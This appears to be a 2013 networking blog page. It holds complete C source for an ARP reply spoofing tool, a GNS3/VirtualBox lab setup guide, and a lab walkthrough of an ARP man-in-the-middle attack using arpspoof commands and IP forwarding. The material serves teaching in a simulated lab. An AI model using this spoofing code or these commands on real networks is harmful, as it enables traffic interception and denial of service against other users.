Wednesday, July 31, 2013

ARP Reply Spoof - C code

ARP Reply Spoof- C code

'ARP SPOOFING - VBox+GNS3 test ' contains introduction to ARP, its working and ARP Spoofing. To understand this post it is recommended that you have a basic idea about these topics.

 In the code given below we broadcast ARP reply in the interface specified. The interface, source ip address and source MAC address are given as parameter to the program. The destination MAC id is set to all 1s for broadcasting. The ARP reply is broadcasted regularly using sleep() so that the original ARP reply is not cached in the target systems ARP table.


 Applications of ARP Spoofing

  • Denial of ServiceThe hacker can broadcast ARP Reply whose source IP is that of a router/gateway and a false source MAC id. Now when a host tries to send a packet to the router/gateway, it is dropped and the hacker has cut off the network from the other side of the gateway (internet).
  • Man-in-the-middleHere the attacker sends ARP reply to the victim-1 stating that it is the victim-2. Also ARP reply is send to victim-2 stating that the attacker is the victim-1. The packet forwarding feature is enabled in the attacker so that all packets between the victim-1 and victim-2 passes through it.

ARP Packet
Ethernet Packet


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <signal.h>
#include <sys/socket.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <netinet/if_ether.h>

int sock;

#define PACKET_LEN sizeof(struct ether_header) + sizeof(struct ether_arp)

void close_sock()
{
  close(sock);
  exit(0);
}

int main(int argc, char ** argv)
{
 char packet[PACKET_LEN];
 struct sockaddr_ll device;
 struct ether_header * eth = (struct ether_header *) packet;
 struct ether_arp * arp = (struct ether_arp *) (packet + sizeof(struct ether_header));
 
 if (argc < 4) 
 {
    puts("Usage: ./a.out <interface> <source ip address> <source mac address>");
  exit(1);
 }

 sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
 if (sock < 0)
   perror("socket"), exit(1);

 signal(SIGINT, close_sock);
  //Source Hardware Address : ARP Packet
  sscanf(argv[3], "%x:%x:%x:%x:%x:%x",  (unsigned int *) &arp->arp_sha[0],
(unsigned int *) &arp->arp_sha[1],
(unsigned int *) &arp->arp_sha[2],
(unsigned int *) &arp->arp_sha[3],
(unsigned int *) &arp->arp_sha[4],
(unsigned int *) &arp->arp_sha[5]);

  //Source Protocol Address : ARP Packet
  sscanf(argv[2], "%d.%d.%d.%d", (int *) &arp->arp_spa[0],
                         (int *) &arp->arp_spa[1],
                         (int *) &arp->arp_spa[2],
                         (int *) &arp->arp_spa[3]);

 //Ethernet Packet
 memset(eth->ether_dhost, 0xff, ETH_ALEN); //destination address : broadcast address
 memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN); //source address
 eth->ether_type = htons(ETH_P_ARP); //type

 //ARP Packet
 arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER); //Format of hardware address
 arp->ea_hdr.ar_pro = htons(ETH_P_IP); //Format of protocol address.
 arp->ea_hdr.ar_hln = ETH_ALEN; //Length of hardware address.
 arp->ea_hdr.ar_pln = 4; //Length of protocol address.
 arp->ea_hdr.ar_op = htons(ARPOP_REPLY); //ARP operation : REPLY
 memset(arp->arp_tha, 0xff, ETH_ALEN); //Target hardware address.
 memset(arp->arp_tpa, 0x00, 4); //Target protocol address.

 memset(&device, 0, sizeof(device));
 device.sll_ifindex = if_nametoindex(argv[1]); //Interface number
 device.sll_family = AF_PACKET;
 memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN); //Physical layer address
 device.sll_halen = htons(ETH_ALEN); //Length of address

 printf("Press Ctrl+C to stop \n");
 while (1) {
   printf("Broadcasting on %s: %s is at %s\n", argv[1], argv[2], argv[3]);
   sendto(sock, packet, PACKET_LEN, 0, (struct sockaddr *) &device, sizeof(device));
   sleep(2);
 }
 return 0;
}

No comments:
Labels: , ,

Adding VirtualBox Guest to GNS3

Adding VirtualBox Guest to GNS3

 1. Install GNS3 and VirtualBox

 2. Add a 'Host-only Network' to VirtualBox Manager
File>Preferences>Network
Click the 'Add host only network' button (right side)
A 'vboxnet0' network appears in the list

 3. Add a guest OS to VirtualBox

 4. Add guestOS to host-only network
Right the newly added guestOS inthe VBox manager
Settings>Networks>Adapter1
Check 'Enable Network Adapter'
Select 'Host-only adapter' in 'Attached To:'
Select 'vboxnet0' in 'Name:'
Under 'Advanced' section uncheck 'Cable connected'
Note down the MAC address
5. Selecting VBoxwrapper in GNS3
GNS3 : Edit>Preferences>VirtualBox>General Settings>Path to VBoxwrapper
Locate the 'vboxwrapper.py' in the 'vboxwrapper/'
Click 'Test Settings'
If 'VBoxwrapper and VirtualBox API 4.1.2_Ubuntu have been successfully started' then its OK

 6. Selecting the guestOS in GNS3
GNS3 : Edit>Preferences>VirtualBox>VirtualBox Guest
Click 'Refresh VM List'
From the 'VM List', select the guestOS and give it an 'Identifier name'
Click 'Save' , the Id Name appears in the list below 'Save'
Click 'Apply' and 'OK'

 7. Adding VirtualBox guest to GNS3
Drag and drop 'VirtualBox guest' to the central panel

 8. Adding Router to GNS3 and Setup an interface 
Drag and drop a Router from the left panel to the central panel
(Note: You should have loaded the particular Routers IOS image in GNS3
              See 'GNS3 non superuser setup' on how to add IOS images
)

9. Connecting Router and guestOS
Click 'Add a Link' and Select 'Ethernet'
In the central Panel, Left Click the Router and then guestOS (select an adapter if asked)
Click the '(X)' to stop adding links
A link appears between the guestOS and Router (in the central panel)
Red dots appear at both the ends of the links
10. Configuring the router 
Right and click 'Start' on the Router in the central panel
Red dot near the Router turns green
Right and click 'Console' the Router in the central panel
In the terminal window that appear
Wait for it to boot (press Enter when asked to get started)
( This not the best way to learn to configure a router.Refer some Cisco or CCNA materials.
     I learned it from CCNA book by Todd Lammle.
)

R3#configure terminal
R3(config)#interface ethernet 0/0
R3(config-if)#ip address 192.168.1.1 255.255.255.0
R3(config-if)#no shutdown
R3(config-if)# [[Ctrl+C]]
R3#copy running-config startup-config
[Enter]
[Enter]
R3#Exit
Close the terminal window

 11. Configuring guestOS
Right and click 'Start' on the guestOS in the central panel
Red dot near the guestOS turns green
After booting, Login and start a terminal

guestOS# ifconfig -a
 from the list that appears find the ethernet number (eg : eth3) of the adapter whose 
 HWaddr is same as the MAC address we noted down in step 4.
guestOS# ifconfig eth3 192.168.1.2 up
 'eth3' is the adapter in my case, can be different in yours
guestOS# ping 192.168.1.1

if ping worked then SUCCESS
(Note : while building larger networks add default gateway as 192.168.1.1 to the guestOS's adapter)

 12. Save the topology setup. 
No comments:
Labels: ,

ARP SPOOFING - VBox+GNS3 test

ARP SPOOFING - VBox+GNS3 test

 Address Resolution Protocol (ARP) is a protocol used for resolution of network layer addresses (IP address) into link layer addresses (MAC address). ARP was defined by RFC 826 in 1982. It is a request and reply protocol and used only within the boundaries of a single network, never across internetwork nodes.

 ARP works on Ethernet networks as follows
When any device wishes to send data to another target device over Ethernet, it must first determine the MAC address of that target given its IP address These IP-to-MAC address mappings are derived from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot direct messages to that target until it obtains a new mapping. To do this, the initiating device first sends an ARP request broadcast message on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcat, allowing the initiating device to update its cache and proceed to deliver messages directly to the target. ARP does not provide methods for authenticating ARP replies on a network, ARP replies can come from systems other than the one with the required Layer 2 address.

 In ARP spoofing the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.

 Here in this tutorial we are trying a man-in-the-middle attack where we send ARP reply to the router from the attacker stating that it is the victim.Also ARP reply is send to victim stating that the attacker is the router.

 Setup a network with at least 2 host connected to a Ethernet switch. This switch is connected to a router. The network I used is shown below.

Network Simulation Software : GNS3


 R1 :             Cisco 3620 Router| 192.168.1.1
BT5R2 :          BackTrack 5 R2 | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 :             Linux Mint 12  | 192.168.1.3 | MAC_ID_2 | Victim

 BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3 
This sends ARP reply to R1 stating that BT5R2 is 192.168.1.3
so R1 saves MAC_ID_1 as the MAC ID of 192.168.1.3
This is reply is send regularly so dont close this process

 terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP reply to Mint 12 stating that BT5R2 is 192.168.1.1
so Mint 12 saves MAC_ID_1 as the MAC ID of 192.168.1.1
This is reply is send regularly so dont close this process

 terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
BT5R2# wireshark & 
So that you can capture the packets for verification
Mint 12
Mint12# ping 192.168.1.1
ping R1, check wireshark @ BT5R2 for 'Redirect' packets.
Those packets will be highlighted in Black.

 R1
To check R1 ARP mapping 
R1#show arp




No comments:
Labels: , , ,
Subscribe to: Posts (Atom)